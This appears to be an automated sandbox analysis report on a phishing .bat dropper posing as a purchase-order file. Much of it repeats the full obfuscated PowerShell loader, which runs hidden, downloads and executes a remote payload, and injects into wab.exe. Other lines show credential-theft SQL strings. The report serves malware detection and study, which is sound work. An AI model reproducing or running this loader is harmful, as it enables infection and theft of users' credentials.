Source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(
Source: powershell.exe, 00000002.00000002.2485251498.0000020B748C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: osoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msilIndbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La '
Source: powershell.exe, 00000002.00000002.2485251498.0000020B748C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: !If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFCA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: powershell.exe -windowstyle hidden If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.h
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFF9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HostApplication=powershell.exe -windowstyle hidden If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievase

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winBAT@50/20@15/11

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,

17_2_004182CE

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,

19_2_00410DE1

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,

17_2_00418758

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,

17_2_00413D4C

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,

17_2_0040B58D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Negligent.Gas

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\shietgtst-TYE3VH
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55kirasc.kll.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" "

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"

Source: C:\Program Files (x86)\Windows Mail\wab.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7616
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5288
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8084

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 0000000A.00000002.4244231504.0000000023E10000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 00000011.00000002.2267503862.0000000003640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Program Files (x86)\Windows Mail\wab.exe

